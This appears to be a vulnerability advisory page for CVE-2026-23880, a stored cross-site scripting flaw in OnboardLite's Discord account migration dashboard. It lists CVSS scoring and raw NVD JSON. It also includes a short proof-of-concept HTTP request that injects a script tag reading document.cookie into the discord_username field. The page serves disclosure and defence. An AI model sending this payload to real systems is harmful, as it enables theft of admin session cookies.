Security Vulnerability Report
CVE-2026-23880 CVSS 7.3 HIGH

Published: 2026-01-19 21:15:52
Last Modified: 2026-04-15 00:35:42

Description

OnboardLite is a comprehensive membership lifecycle platform built for student organizations at the University of Central Florida. Versions of the software prior to commit 1d32081a66f21bcf41df1ecb672490b13f6e429f have a stored cross-site scripting vulnerability that can be rendered to an admin when they attempt to migrate a user's discord account in the dashboard. Commit 1d32081a66f21bcf41df1ecb672490b13f6e429f patches the issue.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

OnboardLite < 1.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
POST /api/discord/migrate HTTP/1.1
Host: target.com
Content-Type: application/json

{
  "user_id": "attacker_id",
  "discord_username": "<script>alert(document.cookie)</script>"
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23880", "sourceIdentifier": "[email protected]", "published": "2026-01-19T21:15:52.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OnboardLite is a comprehensive membership lifecycle platform built for student organizations at the University of Central Florida. Versions of the software prior to commit 1d32081a66f21bcf41df1ecb672490b13f6e429f have a stored cross-site scripting vulnerability that can be rendered to an admin when they attempt to migrate a user's discord account in the dashboard. Commit 1d32081a66f21bcf41df1ecb672490b13f6e429f patches the issue."}, {"lang": "es", "value": "OnboardLite es una plataforma integral para el ciclo de vida de la membresía construida para organizaciones estudiantiles en la Universidad de Florida Central. Las versiones del software anteriores al commit 1d32081a66f21bcf41df1ecb672490b13f6e429f tienen una vulnerabilidad de cross-site scripting almacenado que puede ser renderizada a un administrador cuando intenta migrar la cuenta de Discord de un usuario en el panel de control. El commit 1d32081a66f21bcf41df1ecb672490b13f6e429f corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-116"}]}], "references": [{"url": "https://github.com/HackUCF/OnboardLite/commit/1d32081a66f21bcf41df1ecb672490b13f6e429f", "source": "[email protected]"}, {"url": "https://github.com/HackUCF/OnboardLite/security/advisories/GHSA-93w8-83cg-h89g", "source": "[email protected]"}]}}